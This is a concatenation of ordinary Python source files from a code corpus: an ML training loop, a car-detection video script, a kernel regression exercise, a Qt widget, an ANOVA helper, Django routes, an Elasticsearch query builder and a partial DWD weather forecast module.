torch.cuda.synchronize()\r\n\r\n iteration += 1\r\n cap_n_correct_total += cap_n_correct\r\n cms_int_n_correct_total += cms_int_n_correct\r\n cms_eff_n_correct_total += cms_eff_n_correct\r\n cms_att_n_correct_total += cms_att_n_correct\r\n n_word_total += n_word\r\n cms_int_n_word_total += cms_int_n_word\r\n cms_eff_n_word_total += cms_eff_n_word\r\n cms_att_n_word_total += cms_att_n_word\r\n cap_train_loss_total += cap_train_loss\r\n cms_int_train_loss_total += cms_int_train_loss\r\n cms_eff_train_loss_total += cms_eff_train_loss\r\n cms_att_train_loss_total += cms_att_train_loss\r\n\r\n if iteration % opt['print_loss_every'] ==0:\r\n print('iter %d (epoch %d), cap_train_loss = %.6f, cms_int_train_loss = %.6f, cms_eff_train_loss = %.6f, cms_att_train_loss = %.6f,'\r\n ' current step = %d, current lr = %.3E, cap_acc = %.3f, cms_int_acc = %.3f, cms_eff_acc = %.3f, cms_att_acc = %.3f'\r\n % (iteration, epoch, cap_train_loss, cms_int_train_loss, cms_eff_train_loss, cms_att_train_loss, optimizer.n_current_steps,\r\n optimizer._optimizer.param_groups[0]['lr'],\r\n cap_n_correct/n_word, cms_int_n_correct/cms_int_n_word, cms_eff_n_correct/cms_eff_n_word, cms_att_n_correct/cms_att_n_word))\r\n\r\n # show the intermediate generations\r\n if opt['show_predict']:\r\n cap_pr, cap_gt = show_prediction(cap_probs, cap_labels[:, :-1], cap_vocab, caption=True)\r\n cms_int_pr, cms_int_gt = show_prediction(cms_int_probs, cms_labels_int[:, :-1], cms_vocab,\r\n caption=False)\r\n cms_eff_pr, cms_eff_gt = show_prediction(cms_eff_probs, cms_labels_eff[:, :-1], cms_vocab,\r\n caption=False)\r\n cms_att_pr, cms_att_gt = show_prediction(cms_att_probs, cms_labels_att[:, :-1], cms_vocab,\r\n caption=False)\r\n print(' \\n')\r\n\r\n with open(opt['info_path'], 'a') as f:\r\n f.write('model_%d, cap_loss: %.6f, cms_int_train_loss = %.6f, cms_eff_train_loss = %.6f, cms_att_train_loss = %.6f,\\n'\r\n % (epoch, cap_train_loss / iteration, cms_int_train_loss / iteration,\r\n cms_eff_train_loss / iteration,\r\n cms_att_train_loss / iteration))\r\n f.write('\\n %s \\n %s' % (cap_pr, cap_gt))\r\n f.write('\\n %s \\n %s' % (cms_int_pr, cms_int_gt))\r\n f.write('\\n %s \\n %s' % (cms_eff_pr, cms_eff_gt))\r\n f.write('\\n %s \\n %s' % (cms_att_pr, cms_att_gt))\r\n f.write('\\n')\r\n\r\n print('model_%d, cap_loss: %.6f, cms_int_train_loss = %.6f, cms_eff_train_loss = %.6f, cms_att_train_loss = %.6f,'\r\n 'cap_acc = %.3f, cms_int_acc = %.3f, cms_eff_acc = %.3f, cms_att_acc = %.3f\\n'\r\n % (epoch, cap_train_loss_total / iteration, cms_int_train_loss_total / iteration, cms_eff_train_loss_total / iteration, cms_att_train_loss_total / iteration,\r\n cap_n_correct_total/n_word_total, cms_int_n_correct_total/cms_int_n_word_total, cms_eff_n_correct_total/cms_eff_n_word_total, cms_att_n_correct_total/cms_att_n_word_total))\r\n\r\n\r\n if epoch % opt['save_checkpoint_every'] == 0:\r\n\r\n # save the checkpoint\r\n model_path = os.path.join(opt['output_dir'],\r\n '{}_{}.pth'\r\n .format(opt['output_dir'].split('/')[-1], epoch))\r\n\r\n if torch.__version__ == '1.3.1':\r\n torch.save(model.state_dict(), model_path)\r\n else:\r\n torch.save(model.state_dict(), model_path, _use_new_zipfile_serialization=False)\r\n\r\n print('model saved to %s' % model_path)\r\n with open(opt['model_info_path'], 'a') as f:\r\n f.write('model_%d, cap_loss: %.6f, cms_int_train_loss = %.6f, cms_eff_train_loss = %.6f, cms_att_train_loss = %.6f,'\r\n 'cap_acc = %.3f, cms_int_acc = %.3f, cms_eff_acc = %.3f, cms_att_acc = %.3f\\n'\r\n % (epoch, cap_train_loss_total / iteration, cms_int_train_loss_total / iteration, cms_eff_train_loss_total / iteration, cms_att_train_loss_total / iteration,\r\n cap_n_correct_total/n_word_total, cms_int_n_correct_total/cms_int_n_word_total, cms_eff_n_correct_total/cms_eff_n_word_total, cms_att_n_correct_total/cms_att_n_word_total))\r\n\r\n\r\ndef main(opt):\r\n # load and define dataloader\r\n dataset = VideoDataset(opt, 'train')\r\n dataloader = DataLoader(dataset, batch_size=opt['batch_size'], shuffle=True)\r\n\r\n opt['cms_vocab_size'] = dataset.get_cms_vocab_size()\r\n opt['cap_vocab_size'] = dataset.get_cap_vocab_size()\r\n\r\n\r\n cms_int_text_length = opt['int_max_len']\r\n cms_eff_text_length = opt['eff_max_len']\r\n cms_att_text_length = opt['att_max_len']\r\n\r\n # model initialization.\r\n model = Model(\r\n dataset.get_cap_vocab_size(),\r\n dataset.get_cms_vocab_size(),\r\n cap_max_seq=opt['cap_max_len'],\r\n cms_max_seq_int=cms_int_text_length,\r\n cms_max_seq_eff=cms_eff_text_length,\r\n cms_max_seq_att=cms_att_text_length,\r\n tgt_emb_prj_weight_sharing=False,\r\n vis_emb=opt['dim_vis_feat'],\r\n rnn_layers=opt['rnn_layer'],\r\n d_k=opt['dim_head'],\r\n d_v=opt['dim_head'],\r\n d_model=opt['dim_model'],\r\n d_word_vec=opt['dim_word'],\r\n d_inner=opt['dim_inner'],\r\n n_layers=opt['num_layer'],\r\n n_head=opt['num_head'],\r\n dropout=opt['dropout'])\r\n\r\n # number of parameters\r\n model_parameters = filter(lambda p: p.requires_grad, model.parameters())\r\n params = sum([np.prod(p.size()) for p in model_parameters])\r\n print('number of learnable parameters are {}'.format(params))\r\n\r\n if opt['cuda']: model = model.cuda()\r\n\r\n # resume from previous checkpoint if indicated\r\n if opt['load_checkpoint'] and opt['resume']:\r\n cap_state_dict = torch.load(opt['load_checkpoint'])\r\n model_dict = model.state_dict()\r\n model_dict.update(cap_state_dict)\r\n model.load_state_dict(model_dict)\r\n\r\n optimizer = ScheduledOptim(optim.Adam(filter(lambda x: x.requires_grad, model.parameters()),\r\n betas=(0.9, 0.98), eps=1e-09), 512, opt['warm_up_steps'])\r\n\r\n # note: though we set the init learning rate as np.power(d_model, -0.5),\r\n # grid search indicates different LR may improve the results.\r\n opt['init_lr'] = round(optimizer.init_lr, 3)\r\n\r\n # create checkpoint output directory\r\n dir = opt['output_dir']\r\n if not os.path.exists(dir): os.makedirs(dir)\r\n\r\n # save the model snapshot to local\r\n info_path = os.path.join(dir, 'iteration_info_log.log')\r\n print('model architecture saved to {} \\n {}'.format(info_path, str(model)))\r\n with open(info_path, 'a') as f:\r\n f.write(str(model))\r\n f.write('\\n')\r\n f.write(str(params))\r\n f.write('\\n')\r\n\r\n # log file directory\r\n opt['info_path'] = info_path\r\n opt['model_info_path'] = os.path.join(opt['output_dir'],\r\n 'checkpoint_loss_log.log')\r\n\r\n train(dataloader, model, optimizer, opt, dataset.get_cap_vocab(), dataset.get_cms_vocab())\r\n\r\nif __name__ == '__main__':\r\n opt = parse_opt()\r\n opt = vars(opt)\r\n main(opt)","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":11902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"205266941","text":"import os\nimport sys\nimport skimage.io\nimport matplotlib.pyplot as plt\nimport argparse\n\nsys.path.append(\"cnn\")\nsys.path.append(\"cnn/mrcnn\")\n\nfrom Mask_RCNN import car_detection_train\nimport model as modellib\nimport visualize\nfrom tensorflow.compat.v1 import ConfigProto\nfrom tensorflow.compat.v1 import InteractiveSession\n\nimport cv2\nfrom keras.preprocessing import image\nfrom moviepy.editor import VideoFileClip\nimport visualize_car_detection\n\n\ndef configure():\n # Root directory of the project\n ROOT_DIR = \"./\"\n MODEL_DIR = 'model/'\n MY_MODEL_PATH = MODEL_DIR + 'mask_rcnn_car_0030.h5'\n IMAGE_DIR = os.path.join('Mask_RCNN', \"images\")\n\n config = ConfigProto()\n config.gpu_options.allow_growth = True\n session = InteractiveSession(config=config)\n\n class InferenceConfig(car_detection_train.BalloonConfig):\n # Set batch size to 1 since we'll be running inference on\n # one image at a time. Batch size = GPU_COUNT * IMAGES_PER_GPU\n GPU_COUNT = 1\n IMAGES_PER_GPU = 1\n DETECTION_MIN_CONFIDENCE = 0.6\n\n config = InferenceConfig()\n config.display()\n model = modellib.MaskRCNN(mode=\"inference\", model_dir=MODEL_DIR, config=config)\n model.load_weights(MY_MODEL_PATH, by_name=True)\n # class_names = ['bg', ' ']\n\n return model\n\n\ndef detect_cars(img_name):\n # img = 'dataset/train/1.jpg'\n image = skimage.io.imread(img_name)\n results = model.detect([image], verbose=0)\n r = results[0]\n visualize.display_instances(image, r['rois'], r['masks'], r['class_ids'],\n class_names, colors= [(0.2, 0.2, 0.95)]*100, figsize=(12, 12))\n\n\ndef convert2output(header, box):\n output = ''\n for i in box:\n output += str(header) + ',' + '-1,';\n for j in i:\n output += str(j) + ','\n output += '-1,-1,-1\\n'\n return output\n\nclass_names = ['bg', ' ']\n\nresults_sequence = ''\nheader = 0\n\ndef process_video(input_img):\n global results_sequence\n global header\n global model\n header += 1\n # img = cv2.resize(input_img, (1024, 1024))\n # img = image.img_to_array(img)\n results = model.detect([input_img], verbose=0)\n r = results[0]\n final_img = visualize_car_detection.display_instances2(input_img, r['rois'], r['masks'], r['class_ids'],\n class_names, r['scores'])\n\n plt.imshow(final_img)\n plt.show()\n results_sequence += convert2output(header, r['rois'])\n return final_img\n\ndef parseArgs():\n \"\"\"Parse input arguments.\"\"\"\n parser = argparse.ArgumentParser(description='')\n parser.add_argument('integer', type=int)\n args = parser.parse_args()\n return args\n\n\nif __name__ == '__main__':\n model = configure()\n output = 'output.mp4'\n # get the duration of output video\n params = parseArgs()\n if params:\n duration = params.integer\n else:\n duration = .5\n clip1 = VideoFileClip(\"aic19-track3-train-data/72.mp4\")\n # this function can reduce frames in the video\n # in the demo, we just use 5s duration of the video and two fold faster\n newclip = clip1.fl_time(lambda t: 2*t).set_duration(duration)\n clip = newclip.fl_image(lambda image: process_video(image))\n clip.write_videofile(output, audio=False)\n\n # output the box positions (SORT: tracks these boxes)\n #print(results_sequence)\n with open(\"carBoxesOutput.txt\", \"w\") as fp:\n fp.write(results_sequence)\n\n\n","sub_path":"infer_car_in_video.py","file_name":"infer_car_in_video.py","file_ext":"py","file_size_in_byte":3456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"414396570","text":"import numpy as np\n\ndata = [(0., 0., 0.),\n (0., 0.5, 0.),\n (0., 1., 0.),\n (0.5, 0., 0.5),\n (0.5, 0.5, 0.5),\n (0.5, 1., 0.5),\n (1., 0., 1.),\n (1., 0.5, 1.),\n (1., 1., 1.)]\n\nalpha = 10\n\nW1 = alpha * np.array([[1., 0.], [0., 1.]])\nW2 = alpha * np.array([[0.1, 0.], [0., 1.]])\nW3 = alpha * np.array([[1., 0.], [0., 0.1]])\n\n\n# def mahalanobis(a,d):\n\n\ndef kernel(x, x_prime, W):\n # a and b are 2d vectors stored in a np array\n z = x - x_prime\n ztwz = (z.T)@(W@z)\n distance = np.exp(-1*ztwz)\n return distance\n\ndef kernelized_regression(test_x, W, alt_data):\n\n top_list =[]\n bottom_list = []\n for value in alt_data:\n # current x and y values\n x_n = np.array([value[0], value[1]])\n y_n = value[2]\n # Use our mahalanobis distance kernel to gauge distance to other x vals\n distance = kernel(test_x, x_n, W)\n # add the \n top_list.append(distance*y_n)\n bottom_list.append(distance)\n\n y_hat = sum(top_list)/sum(bottom_list)\n\n return y_hat\n\ndef compute_loss(W):\n\n # losses for each y:\n losses = []\n for i, value in enumerate(data):\n \n # Maybe only search over data not including the test case?\n alt_data = data[:i] + data[i+1:]\n\n y = value[2]\n # construct a 2d vector for each set of x1 and x2 set of values\n test_x = np.array([value[0], value[1]])\n # This is the predicted y value given the above x vector\n y_hat = kernelized_regression(test_x, W, alt_data)\n # Ths is the residual comparing the predicted y value with the actual y value\n residual = y - y_hat\n # Add square the residual and add it to the loss list\n losses.append(pow((residual), 2))\n \n # Sum the loss list and scale by 1/2\n loss = sum(losses)\n return loss\n\n# Need to remove the x_star from the test set\n\n\nprint(compute_loss(W1))\nprint(compute_loss(W2))\nprint(compute_loss(W3))","sub_path":"hw1/T1_P1.py","file_name":"T1_P1.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"155201977","text":"# -*- coding: utf-8 -*-\n\n#\n# Authors: Tomi Jylhä-Ollila, Finland 2013-2016\n# Toni Ruottu, Finland 2013-2014\n#\n# This file is part of Kunquat.\n#\n# CC0 1.0 Universal, http://creativecommons.org/publicdomain/zero/1.0/\n#\n# To the extent possible under law, Kunquat Affirmers have waived all\n# copyright and related or neighboring rights to Kunquat.\n#\n\nfrom PySide.QtCore import *\nfrom PySide.QtGui import *\n\nimport kunquat.tracker.cmdline as cmdline\nfrom .composition import Composition\nfrom .typewriterpanel import TypewriterPanel\n\n\nclass MainSplitter(QSplitter):\n\n def __init__(self):\n super().__init__()\n self._ui_model = None\n self.setOrientation(Qt.Vertical)\n self._composition = Composition()\n self._typewriter_panel = TypewriterPanel()\n\n v = QVBoxLayout()\n v.setContentsMargins(0, 0, 0, 0)\n v.setSpacing(0)\n v.addWidget(self._composition)\n v.addWidget(self._typewriter_panel)\n self.setLayout(v)\n\n def set_ui_model(self, ui_model):\n self._ui_model = ui_model\n self._composition.set_ui_model(ui_model)\n self._typewriter_panel.set_ui_model(ui_model)\n\n def unregister_updaters(self):\n self._typewriter_panel.unregister_updaters()\n self._composition.unregister_updaters()\n\n","sub_path":"kunquat/tracker/ui/views/mainsplitter.py","file_name":"mainsplitter.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"389651430","text":"import pandas as pd\nimport numpy as np\nimport os\nimport scipy.stats as stats\n\n\ndef rmANOVA(df):\n '''\n My attempt at a repeated-measures ANOVA \n In:\n data: dataframe\n\n Out:\n x: symmetric matrix of f-statistics\n **coming soon** p: p-values for each element of x\n '''\n\n stats_dict = dict()\n for dset in df['dataset'].unique():\n alg_list = []\n for alg in df['pipeline'].unique():\n alg_list.append(df[np.logical_and(\n df['dataset'] == dset, df['pipeline'] == alg)]['score'].as_matrix())\n alg_list = [a for a in alg_list if len(a) > 0] #some datasets and algorithms may not exist?\n M = np.stack(alg_list).T\n stats_dict[dset] = _rmanova(M)\n return stats_dict\n\n\ndef _rmanova(matrix):\n mean_subj = matrix.mean(axis=1)\n mean_algo = matrix.mean(axis=0)\n grand_mean = matrix[:].mean()\n\n # SS: sum of squared difference\n SS_algo = len(mean_subj) * np.sum((mean_algo - grand_mean)**2)\n SS_within_subj = np.sum((matrix - mean_algo[np.newaxis, :])**2)\n SS_subject = len(mean_algo) * np.sum((mean_subj - grand_mean)**2)\n SS_error = SS_within_subj - SS_subject\n\n # MS: Mean of squared difference\n MS_algo = SS_algo / (len(mean_algo) - 1)\n MS_error = SS_error / ((len(mean_algo) - 1)*(len(mean_subj) - 1))\n\n # F-statistics\n f = MS_algo/MS_error\n n, k = matrix.shape\n df1 = k-1\n df2 = (k-1)*(n-1) # calculated as one-way repeated-measures ANOVA\n p = stats.f.sf(f, df1, df2)\n return f, p\n","sub_path":"moabb/analysis/meta_analysis.py","file_name":"meta_analysis.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"622169955","text":"from django.conf.urls import url\nfrom . import views\nurlpatterns = [\n url(r'^$', views.index),\n url(r'^library/', views.library),\n url(r'^grade/', views.grade),\n url(r'^internet/', views.internet),\n url(r'^cartoon/', views.cartoon),\n url(r'^fp_growth/',views.fp_growth),\n url(r'^update11/', views.update11),\n url(r'^update12/', views.update12),\n url(r'^update13/', views.update13),\n url(r'^update14/', views.update14),\n url(r'^update15/', views.update15),\n\n url(r'^update21/', views.update21),\n url(r'^update22/', views.update22),\n\n #插入假数据函数\n url(r'^student_info_insert/', views.student_info_insert),\n url(r'^library_insert/', views.library_insert),\n url(r'^grade_insert/', views.grade_insert),\n url(r'^internet_insert/', views.internet_insert),\n url(r'^cartoon_insert/', views.cartoon_insert),\n url(r'^award_insert/', views.award_insert),\n\n\n]","sub_path":"student/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"412032896","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.6 (62161)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/scripy/_path.py\n# Compiled at: 2010-02-16 08:08:48\n\"\"\"Absolute path of files.\"\"\"\n\nclass Bin(object):\n \"\"\"Avoid possible trojans into executables from a modified *PATH*.\"\"\"\n chown = '/bin/chown'\n cp = '/bin/cp'\n grep = '/bin/grep'\n ls = '/bin/ls'\n readlink = '/bin/readlink'\n sed = '/bin/sed'\n modprobe = '/sbin/modprobe'\n apt_get = '/usr/bin/apt-get'\n diff = '/usr/bin/diff'\n find = '/usr/bin/find'\n stat = '/usr/bin/stat'\n sudo = '/usr/bin/sudo'","sub_path":"pycfiles/Scripy-0.9.3-py2.6/_path.py","file_name":"_path.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"100136265","text":"# coding=UTF-8\n# author=suemi\n# created at 16/5/13\nimport requests\nfrom elasticsearch import Elasticsearch\nfrom utils import Constants\n\n\nclass QueryBuilder(object):\n \"\"\"\n 从用户输入中生成符合ES要求的请求体并解析ES返回的响应\n \"\"\"\n\n address = Constants.ES_SETTINGS['host'] + ':' + str(Constants.ES_SETTINGS['port'])\n es = {address: Elasticsearch([address])}\n\n def __init__(self,\n indexName=Constants.INDEX_NAME,\n indexType=Constants.INDEX_TYPE):\n self.indexName = indexName\n self.indexType = indexType\n self.toCluster = False\n self.start = 0\n self.size = None\n self.sortBy = ['_score']\n self.matchFields = {}\n self.word = None\n self.clusterAlgorithm = 'lingo'\n self.address = self.__class__.address\n\n @staticmethod\n def instance(indexName=Constants.INDEX_NAME,\n indexType=Constants.INDEX_TYPE):\n return QueryBuilder(indexName, indexType)\n\n def connect(self):\n \"\"\"\n :return:获取ES连接实例\n \"\"\"\n tmp = self.__class__.es\n if not tmp.has_key(self.address):\n tmp[self.address] = Elasticsearch([self.address])\n return tmp.get(self.address)\n\n def specify(self,\n indexName=Constants.INDEX_NAME,\n indexType=Constants.INDEX_TYPE):\n \"\"\"\n 指定索引名和索引类型\n :param indexName:\n :param indexType:\n :return:\n \"\"\"\n self.indexName = indexName\n self.indexType = indexType\n return self\n\n def term(self, word, field='_all'):\n \"\"\"\n 添加查询词\n :param word:\n :param field:\n :return:\n \"\"\"\n self.matchFields[field] = word\n self.word = word\n return self\n\n def locate(self, host, port=9200):\n \"\"\"\n 修改服务器地址\n :param host:\n :param port:\n :return:\n \"\"\"\n self.address = host + ':' + str(port)\n return self\n\n def cluster(self, toCluster):\n \"\"\"\n 设定是否需要对搜索结果聚类\n :param toCluster:\n :return:\n \"\"\"\n self.toCluster = toCluster\n return self\n\n def algorithm(self, clusterAlgorithm):\n \"\"\"\n 设定聚类算法\n :param clusterAlgorithm:\n :return:\n \"\"\"\n if clusterAlgorithm in ['lingo', 'stc', 'kmeans', 'byurl']:\n self.clusterAlgorithm = clusterAlgorithm\n return self\n\n def limit(self, size):\n \"\"\"\n 返回返回结果上限\n :param size:\n :return:\n \"\"\"\n self.size = size\n return self\n\n def sort(self, sortItem):\n \"\"\"\n 设定返回文档的排序策略\n :param sortItem:\n :return:\n \"\"\"\n tmp = sortItem.split(':')\n if len(tmp) == 1:\n self.sortBy.insert(-1, tmp[0])\n elif len(tmp) == 2:\n self.sortBy.insert(-1, {tmp[0]: {'order': tmp[1]}})\n else:\n raise ValueError\n return self\n\n def cursor(self, start):\n \"\"\"\n 指定返回文档的起始位置,便于分页\n :param start:\n :return:\n \"\"\"\n self.start = start\n return self\n\n def submit(self, document):\n \"\"\"\n 提交一个文档\n :param document:\n :return:\n \"\"\"\n return self.connect().index(self.indexName, self.indexType, document.toDict(), id=document.documentId())\n\n def delete(self, document):\n \"\"\"\n 删除一个文档\n :param document:\n :return:\n \"\"\"\n return self.connect().delete(self.indexName, self.indexType, document.documentId())\n\n def persist(self, document, delta=None):\n \"\"\"\n 更新或插入一个文档\n :param document:\n :param delta:\n :return:\n \"\"\"\n if self.connect().exists(self.indexName, self.indexType, document.documentId()):\n return self.connect().update(self.indexName, self.indexType, document.documentId(),\n document.toDict() if delta is None else delta)\n else:\n return self.submit(document)\n\n def load(self, documentId):\n \"\"\"\n 根据Id获取文档\n :param documentId:\n :return:\n \"\"\"\n return self.connect().get_source(self.indexName, self.indexType, documentId)\n\n # def query(self):\n # \"\"\"\n # 使用Pyes提供的Python API来查询\n # :return:\n # \"\"\"\n #\n # if not self.toCluster:\n # if len(self.matchFields) == 0:\n # # generate_model(self.indexName,self.indexType).objects.filter\n # q = MatchAllQuery()\n # else:\n # item = self.matchFields.items()[-1]\n # q = MatchQuery(item[0], item[1])\n # q = Search(q, start=self.start, size=self.size)\n # sortBy = ''\n # for item in self.sortBy:\n # if isinstance(item, str):\n # sortBy += item + ','\n # elif isinstance(item, dict):\n # tmp = item.popitem()\n # sortBy += tmp[0]\n # sortBy += ':' + tmp[1]['order']\n # sortBy += ','\n # sortBy = sortBy[:-1] if len(sortBy) > 0 else sortBy\n # response = self.connect().search(q, indexes=[self.indexName], sort=sortBy)\n # items = [item for item in response]\n # orignal = response._results\n # for i in range(len(items)):\n # tmp = dict.fromkeys(items[i].keys(), '')\n # for key in tmp.keys():\n # tmp[key] = items[i][key]\n # orignal['hits']['hits'][i]['_source'] = tmp\n #\n # return self.parseResult(orignal)\n # else:\n # return self.rawQuery()\n\n def query(self):\n \"\"\"\n 直接使用ES的Restful请求来查询\n :return:\n \"\"\"\n query = {'match_all': {}} if len(self.matchFields) == 0 else {\n 'match': self.matchFields\n }\n searchRequest = {\n 'query': query,\n \"sort\": self.sortBy,\n 'from': self.start,\n 'highlight': {\n 'pre_tags': [''],\n 'post_tags': [' '],\n # 此处非常重要,由于我们设置的查找域基本为_all,不设置的话就会导致任一域都不高亮\n 'require_field_match': False,\n 'fields': {\n 'title': {\n # 'type': 'fvh', 去掉注释返回高亮的偏移位置\n 'fragment_size': '20',\n \"number_of_fragments\": 1\n\n },\n 'content': {\n # 'type': 'fvh',\n 'fragment_size': '100',\n \"number_of_fragments\": 3\n }\n }\n }\n }\n if self.size is not None:\n searchRequest['size'] = self.size\n\n url = 'http://' + self.address + '/' + self.indexName + '/' + self.indexType\n if self.toCluster:\n requestBody = {\n 'search_request': searchRequest,\n 'query_hint': self.word,\n 'field_mapping': {\n 'title': ['_source.title'],\n 'content': ['_source.content'],\n 'lang': ['_source.lang']\n },\n 'algorithm': self.clusterAlgorithm,\n }\n url += '/_search_with_clusters'\n response = requests.post(url, json=requestBody).json()\n else:\n url += '/_search'\n response = self.connect().search(index=self.indexName, doc_type=self.indexType, body=searchRequest)\n return self.parseResult(response)\n\n def parseResult(self, response):\n \"\"\"\n 解析ES返回的结果\n :param response:\n :return:\n \"\"\"\n\n result = {\n 'abstract': {},\n 'documents': [],\n 'detail': {},\n 'success': True\n }\n if response.has_key('error'):\n result['success'] = False\n result['cause'] = response['error']['root_cause']\n return result\n\n hits = response.get('hits', {\n 'total': 0,\n 'max_score': 0,\n 'hits': []\n })\n result['abstract']['total'] = hits['total']\n result['abstract']['max_score'] = hits['max_score']\n id2index = {}\n for i in range(len(hits['hits'])):\n hit = hits['hits'][i]\n tmp = hit['_source']\n tmp['_score'] = hit['_score']\n tmp['_id'] = hit['_id']\n tmp['highlight'] = hit.get(\"highlight\", {})\n result['documents'].append(tmp)\n id2index[hit['_id']] = i\n\n if self.toCluster:\n clusters = response.get('clusters', [])\n result['abstract']['cluster_num'] = len(clusters)\n result['detail']['clusters'] = clusters\n for cluster in clusters:\n for documentId in cluster['documents']:\n position = id2index[documentId]\n document = result['documents'][position]\n document['label'] = cluster['label']\n\n return result\n","sub_path":"utils/QueryBuilder.py","file_name":"QueryBuilder.py","file_ext":"py","file_size_in_byte":9490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"49426379","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2018-2021, earthobservations developers.\n# Distributed under the MIT License. See LICENSE for more info.\nimport logging\nfrom datetime import datetime\nfrom enum import Enum\nfrom io import StringIO\nfrom typing import Dict, Generator, Optional, Tuple, Union\nfrom urllib.parse import urljoin\n\nimport numpy as np\nimport pandas as pd\nimport requests\nfrom requests import HTTPError\n\nfrom wetterdienst.core.scalar.request import ScalarRequestCore\nfrom wetterdienst.core.scalar.result import StationsResult, ValuesResult\nfrom wetterdienst.core.scalar.values import ScalarValuesCore\nfrom wetterdienst.exceptions import InvalidParameter\nfrom wetterdienst.metadata.columns import Columns\nfrom wetterdienst.metadata.datarange import DataRange\nfrom wetterdienst.metadata.kind import Kind\nfrom wetterdienst.metadata.period import Period, PeriodType\nfrom wetterdienst.metadata.provider import Provider\nfrom wetterdienst.metadata.resolution import Resolution, ResolutionType\nfrom wetterdienst.metadata.timezone import Timezone\nfrom wetterdienst.provider.dwd.forecast.access import KMLReader\nfrom wetterdienst.provider.dwd.forecast.metadata import (\n DwdForecastDate,\n DwdMosmixParameter,\n DwdMosmixType,\n)\nfrom wetterdienst.provider.dwd.forecast.metadata.field_types import INTEGER_PARAMETERS\nfrom wetterdienst.provider.dwd.forecast.metadata.unit import DwdMosmixUnit\nfrom wetterdienst.provider.dwd.metadata.column_names import DwdColumns\nfrom wetterdienst.provider.dwd.metadata.constants import (\n DWD_MOSMIX_L_SINGLE_PATH,\n DWD_MOSMIX_S_PATH,\n DWD_SERVER,\n)\nfrom wetterdienst.provider.dwd.metadata.datetime import DatetimeFormat\nfrom wetterdienst.util.cache import metaindex_cache\nfrom wetterdienst.util.enumeration import parse_enumeration_from_template\nfrom wetterdienst.util.geo import convert_dm_to_dd\nfrom wetterdienst.util.network import list_remote_files_fsspec\n\nlog = logging.getLogger(__name__)\n\n\nclass DwdMosmixDataset(Enum):\n SMALL = \"small\"\n LARGE = \"large\"\n\n\nclass DwdMosmixValues(ScalarValuesCore):\n \"\"\"\n Fetch weather forecast data (KML/MOSMIX_S dataset).\n\n Parameters\n ----------\n station_id : List\n - If None, data for all stations is returned.\n - If not None, station_ids are a list of station ids for which data is desired.\n\n parameter: List\n - If None, data for all parameters is returned.\n - If not None, list of parameters, per MOSMIX definition, see\n https://www.dwd.de/DE/leistungen/opendata/help/schluessel_datenformate/kml/mosmix_elemente_pdf.pdf?__blob=publicationFile&v=2 # noqa:E501,B950\n \"\"\"\n\n _tz = Timezone.GERMANY\n _data_tz = Timezone.UTC\n _has_quality = False\n\n _irregular_parameters = tuple()\n _integer_parameters = INTEGER_PARAMETERS\n _string_parameters = tuple()\n\n def _create_humanized_parameters_mapping(self) -> Dict[str, str]:\n \"\"\"Method for creation of parameter name mappings based on\n self._parameter_base\"\"\"\n hcnm = {\n parameter.value: parameter.name.lower()\n for parameter in self.stations.stations._parameter_base[\n self.stations.stations.mosmix_type.name\n ]\n }\n\n return hcnm\n\n def __init__(self, stations: StationsResult) -> None:\n \"\"\"\"\"\"\n super(DwdMosmixValues, self).__init__(stations=stations)\n\n parameter_base = self.stations.stations._parameter_base\n dataset_accessor = self.stations.stations._dataset_accessor\n\n parameter_ = []\n for parameter, dataset in self.stations.parameter:\n if parameter == dataset:\n parameter = [par.value for par in parameter_base[dataset_accessor]]\n parameter_.extend(parameter)\n else:\n parameter_.append(parameter.value)\n\n self.kml = KMLReader(\n station_ids=self.stations.station_id.tolist(),\n parameters=parameter_,\n )\n\n # TODO: add __eq__ and __str__\n\n @property\n def metadata(self) -> pd.DataFrame:\n \"\"\"\n Wrapper for forecast metadata\n\n :return:\n \"\"\"\n return self.stations.df\n\n def query(self) -> Generator[ValuesResult, None, None]:\n \"\"\"\n Replace collect data method as all information is read once from kml file\n\n :return:\n \"\"\"\n for df in self._collect_station_parameter():\n df = self._coerce_parameter_types(df)\n\n if self.stations.stations.tidy:\n df = self.tidy_up_df(df, self.stations.stations.mosmix_type)\n\n # df = self._tidy_up_df(df)\n\n # df[\n # Columns.DATASET.value\n # ] = self.stations.stations.mosmix_type.value.lower()\n # df[Columns.VALUE.value] = pd.to_numeric(\n # df[Columns.VALUE.value], errors=\"coerce\"\n # ).astype(float)\n\n df = self._coerce_meta_fields(df)\n\n if self.stations.humanize:\n df = self._humanize(df)\n\n df = self._organize_df_columns(df)\n\n result = ValuesResult(stations=self.stations, df=df)\n\n yield result\n\n def _collect_station_parameter(self) -> Generator[pd.DataFrame, None, None]:\n \"\"\"\n Wrapper of read_mosmix to collect forecast data (either latest or for\n defined dates)\n\n :return:\n \"\"\"\n if self.stations.start_issue == DwdForecastDate.LATEST:\n for df in self.read_mosmix(self.stations.stations.start_issue):\n yield df\n else:\n for date in pd.date_range(\n self.stations.stations.start_issue,\n self.stations.stations.end_issue,\n freq=self.stations.frequency.value,\n ):\n try:\n for df in self.read_mosmix(date):\n yield df\n except IndexError as e:\n log.warning(e)\n continue\n\n def _tidy_up_df(self, df: pd.DataFrame, dataset) -> pd.DataFrame:\n \"\"\"\n\n :param df:\n :return:\n \"\"\"\n df_tidy = df.melt(\n id_vars=[\n 